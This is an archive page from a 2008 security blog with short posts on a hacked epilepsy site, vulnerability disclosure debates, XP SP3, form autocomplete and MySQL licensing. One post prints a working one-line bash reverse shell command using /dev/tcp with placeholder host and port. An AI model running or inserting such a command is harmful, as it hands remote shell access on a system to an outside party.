05.08.08

All I can say is ‘Wow’

Posted in IT, Security at 3:57 pm by Tyler Reguly

I read this today on a local news site and the only thought that went through my head was "wow"... Essentially a malicious individual hacked the Epilepsy Foundation's website and posted hundreds of rapidly flashing images. While I don't condone it... I can understand why people think they should target websites for profit or pride... but this? It's just plain mean... It makes me wonder what the world is coming to.

Update: Apparently this is old news and I'm a little slow finding out about it.

Comments on Core Security’s Wonderware advisory

Posted in IT, Security at 10:04 am by Tyler Reguly

There were a couple of random things that I wanted to comment on.

The first was a post by Dave Lewis of Liquidmatrix. The post in question is a discussion of a Wonderware advisory released by Core Security and the level of detail that they provided. Dave doesn't agree with the level of detail provided... as they had details on how to exploit the vulnerability and even showed the assembly from the vulnerable function. He also comments that this isn't responsible disclosure. I'm <sarcasm>really glad to see this debate is coming up again</sarcasm>... but really where's the lack of responsible disclosure? Core reported the vulnerability to the vendor (repeatedly) and went out of their way to ensure the vendor was aware, this is more than a lot of people / companies do. They then continually pushed their advisory release date to accommodate the company. These details are being released after the patch as well.

There's absolutely nothing wrong with this... it's really no different from the level of detail provided by other security vendors that release advisories. Once the patch is out there isn't much to stop malicious individuals from obtaining the assembly to the vulnerable function... a copy of IDA Pro and BinDiff is really all they need. Outside of the assembly... the level of detail provided is really the same as most other security vendors that release advisories. I've seen them include some sort of binary analysis in the past... and most of them contain a text write-up... here's an example with enough text to more than locate the vulnerability from TippingPoint / ZDI:

The specific flaw exists in the oninit.exe process that listens by default on TCP port 1526. During authentication, the process does not validate the length of the supplied user password. An attacker can provide a overly long password and overflow a stack based buffer resulting in arbitrary code execution.

Part of the problem with the InfoSec battle is that the bad guys have essentially unlimited time, where as IS employees have families and lives and work a set schedule. The Core advisory has set internal security teams on their way to developing their own exploits should they need to, without it they'd have had a lot more work to do and it would have taken them more time. Core did everything short of release the related Python and you can't really blame them, since then they'd be giving away their product for free. In the end, what they did was, in my opinion, beneficial to all.

It's one thing to simply release details, but as soon as someone works with the vendor you can't really cry foul when they publish the details. At least not on the 'responsible disclosure' front... because they've followed responsible disclosure and in this case Core Security hasn't done anything different then a number of vendors. Microsoft Tuesday is coming up and watch the mailing lists, each vendor that has reported a vuln usually sends out some sort of advisory and these range from brief overviews to full binary analysis and specific details on exploiting the vulnerability. We've seen it before and we'll see it again... but the patch is out, so they aren't helping the malicious individuals... just the good guys who have time constraints.

05.06.08

XP SP3 and IE

Posted in IT at 3:46 am by Tyler Reguly

I found this blog post rather interesting today. It's an explanation of how SP3 and IE will work together. Essentially it comes down to the following:

If you have IE6: It's business as usual... you will be offered SP3 via Windows Update and you'll still be running IE6 after the update.

If you have IE7: You will be offered SP3 via Windows Update, however once you complete the install of SP3 you'll be unable to revert to IE6. Due to updates that are included for IE6 (which won't be installed since you have IE7), IE7 cannot be uninstalled.

If you have IE8 Beta: You will NOT be offered SP3 via Windows Update. As well, once you install SP3 you will NOT be able to uninstall IE8 Beta. Microsoft is recommending that you uninstall IE8 Beta, install SP3 and then reinstall IE8 Beta if you are using it.

04.26.08

autocomplete=off, yes… it’s really that simple.

Posted in IT at 2:50 am by Tyler Reguly

One of my favourite things is Autocomplete. I'm sure plenty of security folks are cringing right now, but I enjoy it. It saves me a crapload of data entry every time I want to place an order (Name, Address, Phone number) or post a blog comment (Name, Email, Website)...

Anyways... what really bothers me is web developers that don't know about, or refuse to acknowledge the existence of, autocomplete. Let's compare two online ordering systems that I use frequently.

One contains a check box asking if you'd like it to remember your information (excluding credit card information). The entire order form is set to autocomplete=off and if I check the check box, my info is stored in a cookie with a very long expiry date.

The other doesn't save my info, I have to fill it out every time... This is where autocomplete is nice. Name, Address, Apartment Number, Buzzer Code, City, Postal Code, Phone, Email, etc.... Lots of info to provide but for me it's just first letter + tab. I like this feature... My problem is when I get to credit card information. This website hasn't seen the need to set the credit card related fields to autocomplete=off. Now I know that after I order I have to clear saved form data... this was once an issue though.

I ordered from this company via credit card, but then I moved over to cash orders... months later I happened to order via credit card again... this was when I discovered that the data was autocompleted. I find this very frightening for a number of reasons.

So I want to know... do web developers really have a hard time with autocomplete? I want to point out how important and how vital it is to your online form development. That's all... nothing really here, just a bit of a rant that I wanted to get out. Enjoy.

04.22.08

Malicious Flash on LiveJournal.com

Posted in IT, Security at 9:52 am by Tyler Reguly

I don't have much to add, simply details from the original post. Spyware Sucks has a post up documenting some malicious flash that is being served from LiveJournal.com (from one of their banner ads). Just thought I should share to keep people informed.

04.21.08

Kinda Quiet on the CDO Front

Posted in IT, Security at 10:31 pm by Tyler Reguly

I've been kinda quiet here the last few days... That being said I've been posting quite a bit on the nCircle VERT blog. I decided that I wouldn't cross post between blogs and I won't post links to CDO on the nCircle blog for no reason,  however I will post links to the nCircle blog on here...

In the past few days I've posted these stories on the nCircle blog... feel free to give them a read:

I've got a couple interesting blog posts in the works, that will most likely show up here in the near future... but for now there's something to read.

04.17.08

Bash-based Reverse Shell

Posted in IT, Security at 3:07 pm by Tyler Reguly

This is really cool... Neohapsis has a great blog post on how a one line bash shell command can create a reverse shell (via Infosec Ramblings).

Think about all those times when you needed a single command line to create a reverse shell... this will do it:

exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

That's it.. plain and simple and you're done... no need for any outside tools...just the ability to run built in shell commands.

Problems with Firefox 2.0.0.14?

Posted in IT at 10:54 am by Tyler Reguly

I'm wondering if anyone has been experiencing issues with Firefox 2.0.0.14? I installed it as soon as I noticed it... which I'm guessing was 6-7 hours ago but that may be +/- an hour or two. Since then I've had Firefox crash at least 6 times (never more than two tabs open... usually GMail and Bloglines). It just starts "Not Responding" and won't come back out of it.

System:

Windows XP SP2 fully updated
Core2 Quad Q6600 @ 2.40Ghz
3GB RAM available to the OS (32-bit OS)
Plugins Installed: SQL Inject Me, XSS Me, TamperData, User Agent Switcher, Web Developer, Firebug and Greasemonkey.

Portions of MySQL May Go Closed Source (aka Company Offers “Paid Functionality”)

Posted in IT at 9:59 am by Tyler Reguly

A while ago I stopped reading Slashdot because I generally find the information presented to be over-the-top and bordering on "zealot-like"... I suppose "overly dramatic" would work as well. However I was clicking through and ended up on the main page, which lead to reading the following headline: Sun to Begin Close Sourcing MySQL. It lead me to this article and I realized that the Slashdot headline was overzealous and so was Jeremy Cole.

Essentially, MySQL will be releasing some advanced features only to it's enterprise customers. I get this... It makes business sense. The age old adage is, after all, "Why buy the cow, when you can get the milk for free". I kinda feel that the FOSS community sometimes feels a sense of entitlement that they don't deserve. There plenty of FOSS users and supporters, but how many of them actually contribute back to FOSS. They do nothing, until they may lose some "advanced functionality"... then they scream as loud as anyone else.

Numerous people on Jeremy's website commented that MySQL was going to be giving "beta-like" software to their enterprise customers because they didn't have the community to test it. This puts way to much importance on the community. There are plenty of closed-source and paid software companies that ship software directly to enterprise customers without first running it by the FOSS community. This software does just fine.

In the end, this is a bunch of sour grapes over something that really isn't that big of a deal. Use another database or pay for the enterprise software.

04.16.08

XP SP3 By The End of the Month

Posted in IT, Operating Systems, Windows at 5:11 pm by Tyler Reguly

SANS ISC is reporting that various sources are saying that we may see XP SP3 before the end of the month. With OEMs and MSDN subcribers seeing the patch on April 21st and an end-user release date of April 28th.

« Previous entries